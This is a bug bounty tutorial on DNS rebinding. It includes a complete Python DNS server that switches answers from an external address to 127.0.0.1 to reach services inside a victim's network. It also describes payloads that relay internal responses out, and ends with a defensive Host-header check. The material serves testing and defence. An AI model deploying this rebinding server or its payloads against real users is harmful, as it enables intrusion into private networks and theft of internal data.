DNS rebinding is an advanced web security vulnerability that can open doors to impactful bug bounty submissions. The attack uses the victim's browser as a pivot into internal networks and other systems that are reachable only from the victim's network position, by abusing how the Domain Name System (DNS) resolves a name over time. In this blog, we'll explore what DNS rebinding is, how to identify it during bug bounty hunting, and tools and techniques to boost your success rate.
DNS rebinding occurs when an attacker-controlled domain resolves to different IP addresses over time. Initially it resolves to the attacker's server, which delivers the malicious page; on a later lookup it resolves to an internal or restricted IP, such as 127.0.0.1 or 192.168.1.x. Because the hostname in the address bar never changes, the browser treats requests to the rebound address as same-origin, so the page's JavaScript can read responses from the internal service. The same-origin policy is not broken; it is sidestepped, because from the browser's point of view the origin stayed the same. The attack works against services that trust their network position (reachable only from localhost or the LAN, often without authentication) and do not check the Host header of incoming requests.
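The resolver behaviour described above, as an added example written for this article (it is not code from the original post, nor from any of the tools mentioned later): a minimal authoritative DNS server in Python that answers the first A query from each client with the external IP and every later one with the internal IP, using a TTL of 0. The domain and both addresses are placeholders.

```python
"""Minimal authoritative DNS server that performs a DNS rebind.

Added illustration, not the article's tooling. Assumptions (all placeholders):
the attacker controls the NS delegation for ATTACK_DOMAIN, their web server
sits on EXTERNAL_IP, and the target inside the victim's network is INTERNAL_IP.
"""
import socket
import struct
from collections import defaultdict

ATTACK_DOMAIN = "rebind.attacker.example"   # placeholder attacker-controlled zone
EXTERNAL_IP = "203.0.113.10"                 # placeholder (RFC 5737 TEST-NET-3)
INTERNAL_IP = "127.0.0.1"                    # service reachable from the victim's browser

QTYPE_A = 1
QCLASS_IN = 1


def encode_name(name: str) -> bytes:
    """dotted name -> DNS label sequence."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(data: bytes, offset: int):
    """DNS label sequence at offset -> (lowercase dotted name, offset after it)."""
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0 == 0xC0:   # compression pointer; never valid in a question
            raise ValueError("compressed name in question")
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels).lower(), offset


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """Build a plain recursive-desired query (used for testing the server offline)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(data: bytes):
    """-> (txid, qname, qtype, raw question section) for a single-question query."""
    txid, _flags, qdcount = struct.unpack("!HHH", data[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    name, offset = decode_name(data, 12)
    qtype, _qclass = struct.unpack("!HH", data[offset:offset + 4])
    return txid, name, qtype, data[12:offset + 4]


def build_response(txid: int, question: bytes, ip: str, ttl: int) -> bytes:
    """Authoritative NOERROR reply with one A record; name is a pointer to the question."""
    header = struct.pack("!HHHHHH", txid, 0x8500, 1, 1, 0, 0)   # QR=1 AA=1 RD=1
    answer = struct.pack("!HHHIH", 0xC00C, QTYPE_A, QCLASS_IN, ttl, 4) + socket.inet_aton(ip)
    return header + question + answer


class RebindResolver:
    """First A lookup per (client, name) gets EXTERNAL_IP; later lookups get INTERNAL_IP.

    TTL 0 asks intermediate resolvers not to cache, so once the browser's own
    pin expires its next lookup reaches us and receives the internal address.
    """
    def __init__(self, external=EXTERNAL_IP, internal=INTERNAL_IP, ttl=0):
        self.external, self.internal, self.ttl = external, internal, ttl
        self.seen = defaultdict(int)

    def answer_ip(self, client: str, name: str) -> str:
        self.seen[(client, name)] += 1
        return self.external if self.seen[(client, name)] == 1 else self.internal

    def handle(self, data: bytes, client: str) -> bytes:
        txid, name, qtype, question = parse_query(data)
        if not name.endswith(ATTACK_DOMAIN):   # not our zone: REFUSED (rcode 5)
            return struct.pack("!HHHHHH", txid, 0x8005, 1, 0, 0, 0) + question
        if qtype != QTYPE_A:                    # e.g. AAAA: empty NOERROR, browser falls back to A
            return struct.pack("!HHHHHH", txid, 0x8500, 1, 0, 0, 0) + question
        return build_response(txid, question, self.answer_ip(client, name), self.ttl)


def serve(bind="0.0.0.0", port=53):
    resolver = RebindResolver()
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.bind((bind, port))
        while True:
            data, addr = sock.recvfrom(512)
            sock.sendto(resolver.handle(data, addr[0]), addr)


if __name__ == "__main__":
    serve()
```

Run it (as root, for port 53) on the host your NS record delegates to, then open a page under the attack domain in a browser. Browsers pin a resolved address for a short time regardless of TTL, so the attack page's JavaScript has to keep retrying until its fetches start returning the internal service's responses. Keying the flip on (client, name) is deliberately naive: the victim's recursive resolver, not the browser, is the client we see, and a robust server keys on a unique subdomain per session so that unrelated lookups do not flip the answer early.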
Key Uses of DNS Rebinding:
- Accessing Internal Applications: attacking services bound to localhost or internal IPs (admin panels, developer tooling, IoT devices).
- Stealing Sensitive Data: reading responses from internal systems through the victim's browser.
- Remote Code Execution (RCE): triggering vulnerable or unauthenticated APIs on internal services.

How the Attack Works:
1. Attacker Setup: the attacker runs an authoritative DNS server for a domain they control, say malicious.example.com, and hosts a page containing the attack JavaScript.
2. Victim Interaction: the victim opens this domain in their browser.
3. DNS Resolution: the first lookup returns the attacker's external server, with a very low TTL (ideally 0). Browsers cache a resolved address for a short time regardless of TTL, so the payload waits and retries; once that cache expires, the next lookup returns an internal IP.
4. Exploitation: the page's JavaScript now talks to the internal service under the attacker's hostname, so it can read responses and issue requests on the attacker's behalf.

How to Identify DNS Rebinding Targets:
1. Understand the Target's Architecture
Identify exposed applications or endpoints that interact with internal systems, and note which internal-only services (admin panels, developer tooling, APIs on localhost) the target's staff or users are likely to be running.
Look for subdomains or endpoints that resolve via dynamic DNS or rely on IP allowlisting rather than authentication.
2. Scan for Internal IP Leaks
Use nmap and masscan to map the in-scope network you are permitted to scan. You cannot reach a victim's internal network from outside; in a rebinding attack the victim's browser is what reaches it, so the purpose of this step is to learn which services exist, and on which ports, before building a payload.
Look for internal services such as Redis, Elasticsearch, Kubernetes, or web servers on common ports like 80, 443, 8080. HTTP services are the usual targets, because the browser can talk to them directly and read their responses.
3. Look for CORS Misconfigurations
Checking CORS (Cross-Origin Resource Sharing) tells you whether rebinding is needed at all. If an internal service already answers cross-origin requests with a permissive policy (for example, reflecting any Origin with credentials allowed), a plain cross-origin fetch leaks its data and no rebinding is required. DNS rebinding matters when CORS is correctly restrictive: after the rebind the browser treats the request as same-origin, so CORS never enters the picture.
Use tools like corsy, or manual testing with Burp Suite, to check the policy on any internal-facing endpoints you find.
4. Check for IP-Based Access Restrictions
If a service is restricted to internal IPs (bound to 127.0.0.1, or allowlisted by source address) and has no authentication, it is a potential target for DNS rebinding.
Check whether the service accepts requests whose Host header is not its own name or address: send a request with an arbitrary Host value and see whether it still answers normally. A service that rejects unknown Host values is not exploitable this way; one that ignores the header is.
5. Monitor for Same-Origin Policy (SOP) Bypasses
Use JavaScript payloads served from a rebinding domain to detect whether internal systems can be read: the payload repeatedly fetches a path on its own hostname and notes when the response stops coming from your server and starts coming from the internal service.

Tools for DNS Rebinding:
1. Rebind Toolkit
Rebind: a simple, efficient toolkit for creating and testing DNS rebinding attacks. It automatically switches between the attacker-controlled server and internal IPs.
2. Singularity of Origin
Singularity: automates the entire DNS rebinding process (DNS server, attack page and payloads) with an easy-to-use web interface. It also provides attack templates for various scenarios.
3. Burp Suite Plugins
Plugins like Rebinding Assistant, or custom Python scripts, can automate DNS rebinding payload generation.
4. Manual DNS Server Configuration
If using tools isn't an option, run your own authoritative DNS server for the attack domain. It must change its answer over time (your external IP first, the internal IP afterwards) and serve very low TTLs. A static resolver such as dnsmasq can serve low-TTL records but will not flip the answer on its own, so a small custom server, or a scripted zone update between the two phases, is usually required.

Step-by-Step Testing:
1. Set Up a Malicious Domain: register a domain and configure its DNS to serve varying IP responses (your external IP first, the target's internal IP afterwards, with a TTL of 0).
2. Craft Malicious Payloads: use JavaScript that waits for the rebind, then sends HTTP requests to the internal service under your own hostname and relays the responses to a server you control.
3. Host a Malicious Webpage: create a page that serves the payload and have the test victim visit it. In a bug bounty that victim is you, or an authorised tester on the target's network, never a real user.
4. Analyze the Responses: capture network traffic, or the data the payload relays back, to verify whether internal services responded to your crafted requests.

If you discover a DNS rebinding vulnerability:
- Report the issue promptly via the platform's bug bounty program.
- Provide a clear PoC (Proof of Concept) that demonstrates the attack's impact.
- Suggest mitigation strategies, such as:
  - Validating the Host header on every internal service and rejecting requests for names the service is not reached by. This alone defeats rebinding, because the browser still sends the attacker's hostname after the rebind.
  - Requiring authentication for sensitive resources instead of trusting the source IP or network position.
  - Filtering DNS answers that point at private or loopback ranges at the organisation's resolver (dnsmasq's --stop-dns-rebind option does this), and enforcing a resolver-side minimum TTL so that very low TTLs from untrusted zones are not honoured.
If you found this guide helpful and want to support my work, consider buying me a coffee at buymeacoffee.com/dineshpathm ☕ — your support keeps the research and content flowing!
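The Host header check recommended in the mitigation list above, as an added example (not code from the original article): a small Python HTTP service that stands in for any internal-only application, with an allowlist of the names it may be reached by, and a probe that sends the same request twice, once with a legitimate Host and once with the hostname a rebinding page would cause the browser to send. ALLOWED_HOSTS, HostCheckHandler and the attacker hostname are placeholders.

```python
"""Host-header allowlist for a service that would otherwise trust network position.

Added illustration, not the article's code. HostCheckHandler stands in for an
internal HTTP service; ALLOWED_HOSTS is a placeholder list that a real
deployment fills with the names and addresses the service is actually served on.
"""
import threading
from http import HTTPStatus
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer

ALLOWED_HOSTS = {"localhost", "127.0.0.1", "::1", "app.internal.example"}  # placeholders


def host_allowed(host_header, allowed=ALLOWED_HOSTS) -> bool:
    """True only if the Host header names this service; the port is ignored."""
    if not host_header:
        return False
    host = host_header.strip().lower()
    if host.startswith("["):                 # bracketed IPv6 literal, e.g. [::1]:8080
        host = host[1:host.find("]")] if "]" in host else ""
    else:
        host = host.rsplit(":", 1)[0]        # strip :port
    return host in allowed


class HostCheckHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if not host_allowed(self.headers.get("Host")):
            # After a rebind the browser still sends the attacker's hostname here,
            # so refusing unknown Host values stops the attack even on 127.0.0.1.
            self.send_error(HTTPStatus.MISDIRECTED_REQUEST, "unknown Host")
            return
        body = b"secret internal data\n"      # constructed stand-in for the real response
        self.send_response(HTTPStatus.OK)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):            # keep the demo quiet
        pass


def probe(port: int, host_header: str) -> int:
    """GET / on 127.0.0.1:port with an arbitrary Host header; return the status code."""
    conn = HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", "/", headers={"Host": host_header})
    status = conn.getresponse().status
    conn.close()
    return status


def demo():
    """Serve on an ephemeral loopback port and probe it like a rebinding page would."""
    server = HTTPServer(("127.0.0.1", 0), HostCheckHandler)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        legit = probe(port, f"127.0.0.1:{port}")
        rebound = probe(port, "rebind.attacker.example")   # Host the victim's browser sends
    finally:
        server.shutdown()
        server.server_close()
    return legit, rebound


if __name__ == "__main__":
    print(demo())   # (200, 421)
```

The same probe is the check from step 4 of the identification list: run it against a real internal service with a bogus Host value, and a 200 where a 421 or 400 should be tells you the service ignores the header and is a rebinding candidate.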